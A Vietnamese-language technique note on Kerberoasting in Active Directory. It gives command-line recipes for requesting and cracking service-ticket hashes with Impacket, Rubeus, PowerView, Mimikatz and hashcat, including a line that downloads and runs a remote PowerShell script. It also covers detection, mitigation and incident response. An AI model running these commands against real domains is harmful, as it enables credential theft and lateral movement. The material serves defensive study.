Kerberoasting

Kerberoast

Kerberoasing tập trung vào việc thu thập TGS ticket, cụ thể là các vé liên quan đến các dịch vụ hoạt động dưới user accounts trong AD, ngoại trừ computer accounts. Việc mã hóa các vé này sử dụng khóa có nguồn gốc từ user passwords, cho phép có thể offline credential cracking. Việc sử dụng user account như một dịch vụ được chỉ định bằng thuộc tính "ServicePrincipalName"

Để thực hiện Kerberoasting, cần có domain account có khả năng yêu cầu TGS ticket; tuy nhiên, quá trình này không yêu cầu quyền đặc biệt, do đó bất kỳ ai có thông tin xác thực miền hợp lệ đều có thể truy cập

Key Points:

• Kerberoasting nhắm mục tiêu vào TGS tickets cho user-account services trong AD

• Vé được mã hóa với keys từ user passwords có thể crack offline

• Một service được xác định bởi một ServicePrincipalName không null

• Không cần special privileges, chỉ cần valid domain credentials

Attack

Linux

# Metasploit framework
msf> use auxiliary/gather/get_user_spns
# Impacket
GetUserSPNs.py -request -dc-ip <DC_IP> <DOMAIN.FULL>/<USERNAME> -outputfile hashes.kerberoast # Password will be prompted
GetUserSPNs.py -request -dc-ip <DC_IP> -hashes <LMHASH>:<NTHASH> <DOMAIN>/<USERNAME> -outputfile hashes.kerberoast
# kerberoast: https://github.com/skelsec/kerberoast
kerberoast ldap spn 'ldap+ntlm-password://<DOMAIN.FULL>\<USERNAME>:<PASSWORD>@<DC_IP>' -o kerberoastable # 1. Enumerate kerberoastable users
kerberoast spnroast 'kerberos+password://<DOMAIN.FULL>\<USERNAME>:<PASSWORD>@<DC_IP>' -t kerberoastable_spn_users.txt -o kerberoast.hashes # 2. Dump hashes

Multi-features tools bao gồm một tập kerberoastable users:

# ADenum: https://github.com/SecuProject/ADenum
adenum -d <DOMAIN.FULL> -ip <DC_IP> -u <USERNAME> -p <PASSWORD> -c

Windows

• Enumerate Kerberoastable users

# Get Kerberoastable users
setspn.exe -Q */* #This is a built-in binary. Focus on user accounts
Get-NetUser -SPN | select serviceprincipalname #Powerview
.\Rubeus.exe kerberoast /stats

• Technique 1: Ask for TGS and dump it from memory

#Get TGS in memory from a single user
Add-Type -AssemblyName System.IdentityModel 
New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "ServicePrincipalName" #Example: MSSQLSvc/mgmt.domain.local 

#Get TGSs for ALL kerberoastable accounts (PCs included, not really smart)
setspn.exe -T DOMAIN_NAME.LOCAL -Q */* | Select-String '^CN' -Context 0,1 | % { New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList $_.Context.PostContext[0].Trim() }

#List kerberos tickets in memory
klist

# Extract them from memory
Invoke-Mimikatz -Command '"kerberos::list /export"' #Export tickets to current folder

# Transform kirbi ticket to john
python2.7 kirbi2john.py sqldev.kirbi
# Transform john to hashcat
sed 's/\$krb5tgs\$\(.*\):\(.*\)/\$krb5tgs\$23\$\*\1\*\$\2/' crack_file > sqldev_tgs_hashcat

• Technique 2: Automatic tools

# Powerview: Get Kerberoast hash of a user
Request-SPNTicket -SPN "<SPN>" -Format Hashcat #Using PowerView Ex: MSSQLSvc/mgmt.domain.local
# Powerview: Get all Kerberoast hashes
Get-DomainUser * -SPN | Get-DomainSPNTicket -Format Hashcat | Export-Csv .\kerberoast.csv -NoTypeInformation

# Rubeus
.\Rubeus.exe kerberoast /outfile:hashes.kerberoast
.\Rubeus.exe kerberoast /user:svc_mssql /outfile:hashes.kerberoast #Specific user
.\Rubeus.exe kerberoast /ldapfilter:'admincount=1' /nowrap #Get of admins

# Invoke-Kerberoast
iex (new-object Net.WebClient).DownloadString("https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Kerberoast.ps1")
Invoke-Kerberoast -OutputFormat hashcat | % { $_.Hash } | Out-File -Encoding ASCII hashes.kerberoast

Khi có một TGS request, Windows event 4769 - A Kerberos service ticket was requested được tạo.

Cracking

john --format=krb5tgs --wordlist=passwords_kerb.txt hashes.kerberoast
hashcat -m 13100 --force -a 0 hashes.kerberoast passwords_kerb.txt
./tgsrepcrack.py wordlist.txt 1-MSSQLSvc~sql01.medin.local~1433-MYDOMAIN.LOCAL.kirbi

Persistence

Other way: Kerberoast w/0 domain account

Phương pháp này cho phép lấy Service Tickets (ST) thông qua request KRB_AS_REQ , đáng chú ý là không cần phải kiểm soát bất kỳ tài khoản Active Directory nào. Về cơ bản, nếu một principal được thiết lập theo cách không yêu cầu xác thực trước (tình huống tương tự AS-REP Roasting) thì đặc điểm này có thể được tận dụng để thao túng quá trình request. Cụ thể, bằng cách thay đổi thuộc tính sname trong nội dung request, hệ thống bị đánh lừa để cấp ST thay vì TGT được mã hóa tiêu chuẩn.

Lưu ý: Cần danh sách user vì sẽ không có tài khoản hợp lệ để truy vấn LDAP sử dụng kỹ thuật này

Linux

• impacket/GetUserSPNs.py from PR #1413:

GetUserSPNs.py -no-preauth "NO_PREAUTH_USER" -usersfile "LIST_USERS" -dc-host "dc.domain.local" "domain.local"/

Windows

• GhostPack/Rubeus from PR #139:

Rubeus.exe kerberoast /outfile:kerberoastables.txt /domain:"domain.local" /dc:"dc.domain.l

Detect, Mitigate and Respond

DETECT

Theo dõi Window event log cho những TGS request bất thường. Events. Events 4769 và 4770 trong subcategory Audit Kerberos Service Ticket Operations audit TGS requests và renewals. Những sự kiện này cần chú ý vào:

• Sử dụng mã hóa RC4 - Bởi vì RC4(RC4 (type 23) hashes begin with $krb5tgs$23$*) yếu hơn AES (AES-256(type 18) start with $krb5tgs$18$*), TGS requests và replies bao gồm encryptionType là 0x17(rc4-hmac) là đáng ngờ.

• Khối lượng TGS request bất thường - Thiết lập đường cở sở cho khối lượng TGS requests và phát hiện các sai lệch so với đường cơ sở

Ngoài ra, việc thiết lập honeypot Kerberoasting — một tài khoản người dùng có SPN được xác định nhưng thực tế không được sử dụng — có thể giúp phát hiện hoạt động do thám sớm và hoạt động Kerberoasting thực tế.

MITIGATE

Để bảo vệ mật khẩu service account khỏi các cuộc tấn công Kerberoasting, có thể:

• Từ chối các yêu cầu xác thực không sử dụng Kerberos Flexible Authentication Secure Tunneling (FAST) — Còn được gọi là Kerberos Armoring, tiện ích mở rộng xác thực trước này thiết lập một kênh bảo mật xác thực trước giữa máy khách và bộ điều khiển miền, và được thiết kế để bảo vệ tốt hơn các Kerberos ticket khỏi các nỗ lực bẻ khóa mật khẩu ngoại tuyến. Mặc dù FAST có thể loại bỏ rủi ro do Kerberoasting gây ra, nhưng các tổ chức có thể gặp khó khăn khi kích hoạt và thực thi nhanh chóng.
• Loại bỏ việc sử dụng các giao thức không an toàn trong Kerberos — Trong khi việc vô hiệu hóa hoàn toàn RC4 là một nỗ lực lớn khác, bạn có thể cấu hình các tài khoản dịch vụ riêng lẻ để không cho phép giao thức RC4. Thuộc tính msDS-SupportedEncryptionTypes có thể được đặt thành 0x18 (thập phân 24) để chỉ bật AES128 và AES256.

• Áp dụng các chính sách mật khẩu mạnh cho service accont — Mật khẩu tài khoản dịch vụ phải được tạo ngẫu nhiên, có tối thiểu 30 ký tự và thay đổi thường xuyên.

• Sử dụng group managed service accounts (gMSAs) khi có thể — Mật khẩu cho gMSA là 256 byte ngẫu nhiên và được Active Directory tự động tạo và thường xuyên thay đổi. Việc xóa bỏ gánh nặng này khỏi quản trị viên giúp đảm bảo thực hiện chính xác và kịp thời.
• Kiểm tra việc chỉ định SPN cho các tài khoản người dùng có quyền cao hơn — Ví dụ: không nên sử dụng thành viên của Domain Admins làm service accounts và do đó không nên có SPNs được gán.

RESPONSE

Khi phát hiện Kerberoasting, nên thực hiện những hành động sau:

• Kích hoạt quy trình ứng phó sự cố và cảnh bảo nhóm ứng phó sự cố

• Cách ly bất kỳ máy tính nào có liên quan (vd: host đã yêu cầu service tickets) để điều tra pháp y, xóa bỏ và hồi phục

• Đặt lại mật khẩu cho tài khoản người dùng thực hiện Kerberoasting

• Đặt lại mật khẩu cho bất kỳ service account nào được yêu cầu TGS ticket. Nêu ưu tiên cho các tài khoản có đặc quyền

References

KerberoastHackTricks

Kerberoasting AttackNetwrix